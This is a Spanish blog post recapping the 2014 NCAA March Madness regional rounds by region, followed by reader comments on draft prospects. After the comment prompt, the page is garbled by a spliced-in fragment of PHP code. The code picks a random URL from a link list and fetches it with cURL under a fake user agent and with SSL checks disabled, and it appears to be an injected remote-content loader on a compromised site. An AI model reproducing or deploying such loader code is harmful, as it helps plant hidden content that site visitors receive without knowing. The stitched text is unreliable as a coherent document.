March Madness 2014: Ya tenemos equipos para la Final Four

02 de April de 2014 por Ruxixon

SOUTH REGION (by Txusma)

Los Florida Gators (1) sabían que si superaban a UCLA (4) en el Sweet Sixteen tenían muchas posibilidades de entrar en la Final Four por que en el otro lado del cuadro se enfrentaban rivales teóricamente inferiores como Dayton (11) y Stanford (10). Con esta idea en la cabeza los de Billy Donovan salieron a imponer su juego desde el primer minuto y a no permitir correr a los Bruins. Florida se puso por delante a los 8 minutos y ya no perdió la ventaja en ningún momento. El partido transcurrió igualado pero con los Gators siempre unos puntos por delante. Kyle Anderson (11p – 9r – 5a) estaba perfectamente controlado y cualquier intento de UCLA por igualar el partido era respondido por Florida que tuvo en Michael Frazier III su mejor hombre con 19 puntos y 5 de 9 en triples. A falta de 10 minutos, los Bruins consiguieron ponerse a un solo punto pero fue un espejismo. Un parcial de 10-0 con Scott Wilbekin (13p) como protagonista y una defensa aún mejor que no dejó correr más a los jugadores los rivales, finiquitó el partido.

En el otro partido del Sweet Sixteen, Dayton sí que fue capaz de correr y vencer a Stanford gracias a los 15 puntos más que anotaron al contrataque. Hasta 12 jugadores participaron en la 1ª mitad por parte de los Flyers y los 12 cumplieron a la perfección su papel. En cambio, la corta rotación de los Cardinals acabó siendo un hándicap porque los problemas de faltas aparecieron cuando aún quedaban muchos minutos por delante. Su mejor jugador en el partido, Dwight Powell (17p – 9r), se fue a la ducha cuando todavía quedaban 5 minutos por jugarse. Stanford no pudo imponer su poderoso juego interior ni sujetar a Jordan Sibert que acabó el partido con 18 puntos.

Sin embargo la aventura de los Dayton Flyers acabaría en la siguiente ronda. Los Gators les controlaron en todo momento y solo les permitieron 8 puntos al contraataque y es que desde el primer momento quedó patente la diferencia de nivel entre uno y otro equipo. La presión a toda la pista que plantaron los de Billy Donovan en momentos puntuales del partido ahogó a los Dayton que no pudieron superarla prácticamente en ninguna ocasión. Scottie Wilbekin (23p) y Patrick Young (12p – 6r – 2rb – 4t) lideraron a un equipo que se planta en la Final Four tras ganar todos sus partidosde la March Madness por más de 10 o más puntos de diferencia. No puede haber mejor tarjeta de presentación. 

WEST REGION (by Txusma)

Arizona (1) sudó sangre para doblegar a San Diego State (4) en el Sweet Sixteen. De hecho, durante la mayor parte del partido estuvo por detrás en el marcador de un partido jugado con una gran intensidad y en que las defensas se impusieron a los ataques. Aaron Gordon (15p – 6r – 2t) por un lado y Xavier Themes (25p) lideraban a sus equipos cuando solo faltaban 3 minutos para acabar y los Wildcats se habían conseguido poner por fin por delante. Fue en ese momento cuando Nick Johnson (15p – 8r – 3a)  consiguió su primera canasta tras haber fallado previamente nada más y nada menos que 10 tiros. Pues bien, el escolta de Arizona acabó el partido con 15 puntos y un 10 de 10 en tiros libres, todos anotados en los últimos 2 minutos y 46 segundos del encuentro. Fueron esos tiros libres los que acabaron certificando la trabajadísima victoria de Arizona.

Muchos más fácil lo tuvo Wisconsin (2) a pesar de que las previas hablaban de la gran defensa zonal de Baylor (6) que había parado a Nebraska y Creighton en los partidos anteriores. A la hora de verdad los Badgers superaron con relativa facilidad la defensa de los Bears de la mano de un Frank Kaminsky (19p – 4r – 6t) clave a ambos lados de la pista sobretodo en la 1ª parte. Apenas Corey Jefferson (15p – 7p) pudo plantar algo de batalla.

La pelea entre Wisconsin (2) y Arizona (1) por llegar a la Final Four fue titánica. Un partido muy físico, muy intenso, en el que las diferencias fueron mínimas y las distancias en los minutos finales nunca superaron los 3 puntos. Un partido así pedía a gritos una prórroga que elevara el dramatismo hasta cotas insospechadas y en la prórroga se decidió. Con este caldo de cultivo parece hasta normal que los brazos se encogieran. Sam Dekker se quedó en 7 puntos, Aaron Gordon falló lo indecible aunque capturó 18 rebotes, Nick Johnson se fue para casa con un 6 de 16, Traevon Johnson también falló 10 tiros… Entre tantas imprecisiones emergió la figura de un gigante, un jugador prácticamente desconocido antes de la March Madness, el pívot Frank Kaminsky (28p -11r). Él sólo volvió loca a toda la defensa de los Wildcats y acabó anotando casi la mitad de puntos de su equipo. Suyas fueran las últimas 3 canastas de los Badgers de una prórroga que acabó con polémica ya que los árbitros pitaron una falta en ataque a Nick Johnson bastante discutible cuando tenía posesión para llevarse el partido. ¿Fin de la emoción? No. Arizona fue capaz de recuperar la posesión y disponer todavía de un intento para sellar su pase a la Final Four pero el tiro a la desesperada de Johnson no entró.

EAST REGION (by Ruxixon)

La NCAA no entiende de favoritismos y es que aunque Connecticut era el superviviente con el peor seed de la región en este punto del torneo (7), se han ganado su derecho de jugar a la Final Four. En el Sweet Sixteen eliminaron a una Iowa State (3) demasiado melancólica por la baja de Niang y con dos de sus mejores jugadores negados de cara al aro, Kane y Ejim, combinándose para un 9 de 31. Así, a falta de 7:42 para el final, el marcador era 61-45 favorable para Connecticut, que se apoyaba en la aportación de un desatadoShabazz Napier (19-5-5) y en DeAndre Daniels (27 p, 10 r). Los Cyclones, impulsados por Dustin Hogue, que acabaría haciendo el máximo de su carrera con 34 puntos, parecían animar los minutos finales reduciendo la diferencia a 4 puntos, pero acto seguido un triple de Giffey con 1:49 por disputarse dio el carpetazo definitivo al partido, y sólo hubo tiempo para el carrusel de tiros libres donde los Huskies no fallaron, llegando al 81-76 final.

Su rival sería el ganador del duelo entre Virginia (1) y Michigan State (4). El encuentro comenzó con los Spartans aprovechando para correr siempre que podían, evitando así el entramado defensivo dispuesto por Tony Bennett. Poco les duro la alegría pues mediada la primera parte se empezó a jugar a lo que quería Virginia. A través de una defensa muy activa y luchando por cada rebote (14 rebotes ofensivos) –enorme mérito teniendo en cuenta la diferencia física-, los Cavaliers se metían en el partido. Además, Michigan St les “echó una mano” tras la reanudación con 5 pérdidas y errando 7 de sus primeros 8 lanzamientos, aunque no supusieron una brecha importante en el marcador ya que limitaban a un pobre 35% su ofensiva. Finalmente, los Spartans tuvieron que tirar de las mejores versiones de Branden Dawson (24 p-10 r) y Adreian Payne (16 p) para desequilibrar la balanza a su favor, a pesar de las últimas intentonas de Joe Harris desde el triple (17 p). 61-59 para Michigan State.

La final regional discurrió en un ambiente puramente defensivo (ninguno de los 2 equipos superó el 40% de acierto en el tiro) donde Kevin Ollie jugó mejor las armas de su equipo. Si conseguía cerrar la zona, obligando a Michigan a realizar tiros exteriores, limitaba la ventaja física de los Spartans. La premisa era clara y sus jugadores lo llevaron a la práctica y dejaron en 6 los puntos recibidos en su pintura. Hombres como Dawson, sólo 3 tiros, y un Payne abusando del triple con un 3 de 10, resumen la asfixia de los Spartans en el ataque. En el bando contrario un protagonista por encima de todos. “No iba a permitir que su equipo perdiera”. Gary Harris (22 p, 8-14 en TC con un 4-9 en triples) lo tenía claro después del partido y es que Shabazz Napier, para delirio de los fans de los Huskies que abarrotaban el Madison Square Garden, fue el dominador del encuentro con 25 puntos, 6 rebotes y 4 asistencias, incluida la jugada que cerraría virtualmente la final del Este cuando a falta de 30 segundos, y 2 arriba Connecticut, Appling hizo (su quinta) falta sobre su intento de triple. El partido estaba resuelto (60-54) y Connecticut avanzaba a la que es su 5ª Final Four, donde sólo han perdido 1 partido en toda su historia.

MIDWEST REGION (by Ruxixon)

Decíamos en la previa que uno de los defectos de Michigan (2) en esta temporada son esas pájaras que le lleva a complicarse la vida en partidos controlados. A falta de 3:40 para el final una ventaja de 10 puntos, fraguada gracias a una gran circulación del balón y mucho tiro exterior (Nik Stauskas 14 p, Glenn Robinson III 13), daba ciertas garantías para pensar en el Elite 8. Pero a los Wolverines les gusta jugar con fuego y dieron vida a Tennessee (11) que de la mano de Jordan McRae (24 p, 6 r, 4 t), con 9 puntos, lideró un parcial de 11-2, dejando el tanteo en un 71-72 para Michigan a falta de 11 segundos. Esos 11 segundos dan para película de suspense. Tras el tiempo muerto pedido por Beilein, Levert (10 puntos, 5 pérdidas) pierde la bola al pisar la línea de fondo tras recibir de Albrecht, lo que le da la oportunidad de ganar el encuentro a los Vols’. Se la jugaría Jarnell Stokes (11 p, 6 r), con la defensa de Jordan Morgan (15 p, 7 r) y con Levert en la ayuda. Sin un tiro a media distancia fiable, ataca la pintura pero en su camino tira a Morgan, sonando el silbato de los árbitros. Parte del público celebraba que Stokes iría a la línea de TL pero enseguida llegó la indignación pues determinaron que era falta en ataque. Michigan se había salvado (73-71) y tenía la oportunidad de poder repetir presencia en la Final Four por segundo año consecutivo.

Ese privilegio lo perdió Louisville (4) en el revival de una rivalidad histórica y geográfica tras caer ante Kentucky (8) por 74-69. Curioso el caso de los Wildcats. A pesar de lo poco elaborado de su juego y de su escasa experiencia, nunca se van de los partidos aunque el rival vaya ganando con solvencia. Sobreviven con la inspiración de unos jugadores llenos de talento, multiplicada cuando la bola quema, y con un amplio arsenal de jugadores interiores que marcan la diferencia. Louisville sufrió todo esto tras ir ganando la mayoría del encuentro (Kentucky se puso por delante con la canasta inicial y no volvería a coger el mando hasta el 1:27 final). Alex Poythress (6 p, 4 r, 1 t) no fue el mejor, pero dio unos minutos que fueron claves para desactivar la moral de los Cardinals, que también esfumaron sus opciones con un pobre 13-23 en los libres. Russ Smith (23 p pero un 4-10 en los libres) fue su mejor hombre pero estuvo fallón en la segunda mitad y sólo Hancock (19 p) desde la línea de 3, ante la expulsión de Harrell (15 p, 8 r) por acumulación de faltas, intentó que el final del encuentro fuera otro. Por Kentucky, Julius Randle 15-12, Dakari Johnson 15-6 y entre los gemelos Harrison 29 puntos.

El final del Kentucky – Michigan ha dado que hablar con este game winner a falta de 2.3 segundos de Aaron Harrison colocando el definitivo 75-72 en el marcador. Sin embargo no hay que olvidar que fue el juego interior de Kentucky lo que doblegó a Michigan (35 rebotes por 24 de los Wolverines). Morgan (11-4), que ha disputado muy buen torneo, estuvo demasiado solo para parar a los interiores de los  Wildcats. No obstante Michigan luchó el partido hasta el último segundo y buena parte de ello se debe, como no, a la brillante actuación de Stauskas con 24 p, y en menor medida a Glenn Robinson III (14 p) con 2 buenos triples desde la esquina para mantenerlos con vida en los últimos minutos. En el bando de Calipari, al habitual “Mr.Doble-Doble”, Julius Randle (16-11), hay que sumar la extraordinaria aportación de Marcus Lee con 10 puntos y 8 rebotes, 7 de ellos ofensivos.  Apartado de la rotación habitual de Calipari parece que jugará los minutos que deja Caunley-Stein con su lesión. Conviene no olvidarse del muchacho –al parecer un excelente jugador de vóley- de cara al futuro.

Comenta

6 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Ni idea de los problemas de Wilbekin fuera de las canchas,supongo que le habrá afectado de cara al draft,pero a un servidor le parece un crack,bastante por encima de otros PG que aparecen en los mocks.A ver si su cabeza le deja llegar a la NBA.

      Citar

  2. Viva_Dirk dice:
    #2

    Es un caso muy raro, no aparece en ningun mock y ya es senior, siendo del 93. A mi me parece un muy buen jugador, no se si alguien se atreverá con él en el draft pero si no es así ojala venga a Europa y no se quede en la D-League o similares.

      Citar

  3. Denise dice:
    #3

    ¿Como es posible que Randle colocando a su equipo en la Final Four, esté bajando posiciones en los mocks del Draft? En la mayoría de mocks que he visto le dan entre el pick 6 y el 9, cuando hasta hace bien poco era un Top 5 fijo.

      Citar

  4. Denise dice:
    #4

    Pues un triple de Aaron Harrison a 6 segundos del final, le da a Kentucky el pase a la final. Su rival será Connecticut que derrotó a Florida.
    Creo que Kentucky es favorito con ese Big 3 Randle, Young, Harrison, todos ellos proyectados en los mocks como primeras rondas del Draft.

      Citar

  5. Denise dice:
    #5

    Denise:
    Pues un triple de Aaron Harrison a 6 segundos del final, le da a Kentucky el pase a la final. Su rival será Connecticut que derrotó a Florida.
    Creo que Kentucky es favorito con ese Big 3 Randle, Young, Harrison, todos ellos proyectados en los mocks como primeras rondas del Draft.

    Bueno, y me olvidaba de Andrew Harrison, hermano de Aaron, y que en la mayoría de mocks aparece delante de su hermano.

      Citar

  6. Denise dice:
    #6

    Y una lastima que Cauley-Stein finalmente no se ha recuperado del tobillo y no va a poder jugar la final. Qué gran quinteto de Kentucky.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>